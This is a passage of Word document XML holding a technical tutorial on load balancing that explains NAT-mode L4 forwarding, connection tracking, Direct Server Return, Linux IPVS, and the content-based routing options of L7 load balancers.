      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB selects a backend server (e.g., 10.0.1.5:8080).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD8AD7C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB rewrites the destination IP/port in the packet header: 203.0.113.10:443 → 10.0.1.5:8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72846C26" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB also rewrites the source IP to its own internal IP (so the backend's response comes back through the LB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35E29E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Packet is forwarded to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743A821" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend responds to the LB's internal IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995E6EE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB rewrites the source in the response back to the VIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C93CDD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Response reaches the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71309C42" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The connection tracking table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E79618" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB maintains a table mapping each connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F761C50" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129242B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client 198.51.100.5:52341 ↔ Backend 10.0.1.5:8080 (established, idle 2s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525D703E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client 198.51.100.9:48822 ↔ Backend 10.0.1.7:8080 (established, idle 0s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A7E6A5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>All packets belonging to the same TCP connection (identified by the 5-tuple: src IP, src port, dst IP, dst port, protocol) are routed to the same backend. This is crucial — you can't send the SYN to one backend and the ACK to another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754825E6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The table size problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> At massive scale (millions of concurrent connections), this table consumes significant memory. Each entry is ~128–256 bytes. 10 million connections = ~2.5 GB just for tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE2E036" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 DSR (Direct Server Return) — The Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C07AF7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with NAT:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> All traffic (including responses) flows through the LB. For large downloads or streaming, the response bandwidth through the LB becomes the bottleneck. A video response is 1000x larger than the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683A3F9A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How DSR works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA6EA1D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client sends request to LB's VIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277014FB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB selects a backend, rewrites only the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 2 (MAC address)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> in the frame — pointing to the backend's NIC. The IP destination remains the VIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1AEBD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Backend receives the packet. It has the VIP configured on its loopback interface (so it accepts the packet even though the destination IP is the VIP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F93C10" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend processes the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0981FC85" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend responds </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>directly to the client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> (source IP = VIP), bypassing the LB entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC13176" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40937015" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Request: Client → LB → Backend (small, e.g., HTTP GET = 200 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733FA4E6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Response: Backend → Client directly (large, e.g., video chunk = 2 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA61280" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB only handles inbound traffic. Outbound bandwidth is unlimited (no bottleneck).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D209795" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constraints of DSR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46641C4D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB cannot modify the response (no response header injection, no compression).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E8267" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB cannot perform SSL termination (it doesn't see the response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD6763" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backends must have the VIP on loopback (operational complexity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473FCC2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Only works within the same L2 network (or with IP-in-IP tunneling for L3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B4765E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 IPVS (IP Virtual Server) — Linux Kernel L4 Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062DD077" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A31051" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>IPVS is implemented inside the Linux kernel's netfilter framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5B7E9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A virtual service is defined: VIP:port → list of real servers with weights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5D403B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Incoming packets matching the VIP:port are intercepted in the kernel (before reaching userspace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76086C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>IPVS applies a scheduling algorithm to select a real server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E1424" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Packet is forwarded (NAT, DSR/DR, or IP tunneling mode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC77B0C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why kernel-level matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC870A0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No context switches between kernel and userspace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9567F1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No data copying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C15CC5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Handles millions of connections with microsecond overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0510D1B4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Used by: Kubernetes kube-proxy (IPVS mode), LVS, Keepalived.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71499B96" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> IPVS can handle 1M+ concurrent connections and 100K+ new connections/second on commodity hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2C859" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 L4 Advantages and When to Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2CC5BE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raw performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Orders of magnitude faster than L7 (no protocol parsing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AAC179" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol agnostic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Works for HTTP, WebSockets, gRPC, database connections, any TCP/UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD0251" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Adds microseconds, not milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DEC294" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use when:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> You need raw throughput, support non-HTTP protocols, or as a front layer before L7 balancers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DB89D8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="08E9729B">
          <v:rect id="_x0000_i2673" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F441AC1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Layer 7 (Application Layer) Load Balancing — Deep Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C33E8C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 What L7 Load Balancing Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274351EF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB fully terminates the client connection, parses the application protocol (HTTP/HTTPS/gRPC), inspects content, makes routing decisions based on application-level data, then opens a NEW connection to the selected backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAB05D4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This means:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> There are TWO TCP connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B8536" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client ↔ Load Balancer (front-end connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D02315F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Load Balancer ↔ Backend (back-end connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CF1AA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 What L7 Can Inspect and Route On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3FCCAB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> /api/v2/users → User Service; /api/v2/orders → Order Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B81A8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP method:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> GET requests → read replicas; POST/PUT → primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C9D317" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Accept-Language: fr → French server pool; X-Tenant-Id: acme → dedicated Acme cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B3D0A8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookies:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Session cookies for sticky routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B587275" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query parameters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> ?version=beta → canary servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BB989" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request body:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> (rarely, expensive) route based on GraphQL operation name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67799E19" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS SNI (Server Name Indication):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Route different domains to different backends without terminating TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB32369" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
